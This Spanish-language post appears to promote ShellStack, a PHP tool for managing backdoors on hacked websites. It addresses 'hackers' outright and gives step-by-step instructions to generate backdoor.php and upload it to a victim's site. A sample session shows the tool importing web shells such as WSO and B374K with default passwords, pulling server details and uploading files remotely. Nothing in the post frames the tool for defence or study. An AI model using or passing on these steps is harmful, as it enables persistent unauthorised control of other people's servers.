Auditando Aplicacion Web

Penetration Testing Realizando una auditoria de Seguridad a tu Sistema Operativo, por ><Mitnick Security ><

Herramienta

ShellStack - Una herramienta en PHP para administrar todos tus sitios

ShellStack es una herramienta de gestión de puertas traseras basada en PHP. Esta herramienta es útil para “HACKERS” que desean mantener una pista de cada sitio web hackeados. La herramienta genera un archivo backdoor que sólo se tiene que subir al sitio y poner la URL de backdoor en el shells.txt presente en el directorio de la herramienta.

Con ShellStack puedes

Importar shells de PHP
Obtener los detalles del servidor
Subir archivos desde su sistema usando su terminal
Y sobre todo puedes manejar tus puertas traseras de manera eficiente.

Modo de uso

Git clone https://github.com/Tuhinshubhra/shellstack
Cd shellstack
Php shellstack.php
Generatebd y salir del uso de la herramienta CTRL + C – Esto generará un archivo backdoor en el mismo directorio que de la herramienta en un archivo llamado backdoor.php
Subir el archivo Backdoor al sitio web de la víctima
Copia la URL de puerta trasera y pégala en el archivo shells.txt presente en el directorio de la herramienta y guárdela (cada puerta trasera está separada por una nueva línea)

Video

https://youtu.be/umk3ZNZ5Y1I

Requerimientos:

php
curl

Ejemplo:

Código: Text

user@computer:$ /home/redhaxor/Desktop/shellstack# php shellstack.php

________________________________________________________________________________
_______ _ _ _______ _______ _______ _______ _______ _ _
|______ |_____| |______ | | |______ | |_____| | |____/
______| | | |______ |_____ |_____ ______| | | | |_____ | \_
________________________________________________________________________________

Simple Backdoor Management System
Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra
Shout Out: LulZSec India
================================================================================

List Of Backdoors:

0. http://localhost/backdoor.php
=============================================

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1

Press Enter To Continue

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1

List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1

[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php

Press Enter To Continue

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload

[5] Exit

[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack#

Descarga:

https://github.com/Tuhinshubhra/shellstack